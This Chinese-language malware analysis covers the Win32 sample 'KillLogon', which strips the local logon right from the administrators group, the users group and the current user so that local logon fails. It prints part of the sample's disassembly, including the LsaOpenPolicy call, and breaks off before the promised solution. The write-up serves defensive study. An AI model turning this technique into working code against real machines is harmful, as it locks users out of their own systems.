Malware.Win32.KillLogon分析及解决方案

　　该程序执行后先删除administrators、users组的SeInteractiveLogonRight（本地或交互式登陆特权），然后在删当前用户的，删完后交互式登陆无法进行验证，导致用户无法从本地登陆计算机系统。分析如下：

　　004010B0　　 　 　 /$ 83EC 34　　 　 　sub esp,34

　　004010B3　　 　 　 |. B9 06000000　　 mov ecx,6

　　004010B8　　 　 　 |. 33C0　　 　 　 　xor eax,eax

　　004010BA　　 　 　 |. 56　　 　 　 　 push esi

　　004010BB　　 　 　 |. 57　　 　 　 　 push edi

　　004010BC　　 　 　 |. 8D7C24 24　　 　lea edi,dword ptr ss:[esp+24]

　　004010C0　　 　 　 |. F3:AB　　 　 　 rep stos dword ptr es:[edi]

　　004010C2　　 　 　 |. 8D4424 08　　 　lea eax,dword ptr ss:[esp+8]

　　004010C6　　 　 　 |. 8D4C24 24　　 　lea ecx,dword ptr ss:[esp+24]

　　004010CA　　 　 　 |. 50　　 　 　 　 push eax

　　004010CB　　 　 　 |. 68 000000E0　　 push E0000000

　　004010D0　　 　 　 |. 51　　 　 　 　 push ecx

　　004010D1　　 　 　 |. 6A 00　　 　 　 push 0

　　004010D3　　 　 　 |. E8 E4000000　　 call <jmp.&ADVAPI32.LsaOpenPolicy>

　　004010D8　　 　 　 |. 85C0　　 　 　 　test eax,eax

　　004010DA　　 　 　 |. 0F85 9F000000　　jnz test.0040117F

　　004010E0　　 　 　 |. 6A 64　　 　 　 push 64

　　004010E2　　 　 　 |. C74424 14 F40100>mov dword ptr ss:[esp+14],1F4

　　004010EA　　 　 　 |. E8 DE000000　　 call test.004011CD

　　004010EF　　 　 　 |. 83C4 04　　 　 　add esp,4